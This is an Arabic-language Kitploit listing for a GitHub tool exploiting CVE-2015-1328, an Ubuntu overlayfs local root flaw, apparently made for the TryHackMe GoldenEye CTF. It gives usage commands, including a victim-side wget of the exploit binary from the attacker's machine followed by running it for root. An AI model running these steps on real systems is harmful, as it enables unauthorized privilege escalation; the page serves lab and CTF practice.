Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2015-1328-GoldenEye — استغلال النواة | Kitploit
أدوات/GitHubGitHub/elit3pwner/cve-2015-1328-goldeneye
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالCTFاختبار الاختراق
GitHubelit3pwner/cve-2015-1328-goldeneye

CVE-2015-1328-GoldenEye

استغلال النواة

عرض المستودع
10منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2015-1328-GoldenEye

حول الاستغلال:

إن تنفيذ overlayfs في حزمة linux (المعروفة أيضًا باسم Linux kernel) قبل الإصدار 3.19.0-21.21 في Ubuntu حتى 15.04 لا يتحقق بشكل صحيح من صلاحيات إنشاء الملفات في دليل نظام الملفات العلوي، مما يسمح للمستخدمين المحليين بالحصول على وصول الجذر (root) من خلال استغلال تكوين يُسمح فيه بـ overlayfs في مساحة أسماء تركيب (mount namespace) عشوائية.

شكرًا لـ rebel

الإعدادات

هذا استغلال آلي لـ CVE-2015-1328 لـ GoldenEye CTF من TryHackMe افتراضيًا، لا يتوفر gcc على تلك الآلة، لذا قمت بإعداد gcc إلى cc وبناءً عليه قمت بتشغيل الاستغلال للحصول على صلاحيات الجذر.

فقط استنسخ المستودع وقم بتشغيل exploit.sh

على جهاز المهاجم:

التثبيت

فقط، استنسخ هذا المستودع -

root@kitploit:~
$ git clone https://github.com/elit3pwner/CVE-2015-1328-GoldenEye.git
$ cd CVE-2015-1328-GoldenEye
$ chmod +x exploit.sh
$ bash exploit.sh

على جهاز الضحية:

root@kitploit:~
$ wget http://<target ip>:6969/exploit

$ chmod +x exploit

$ ./exploit
تنزيل الأداة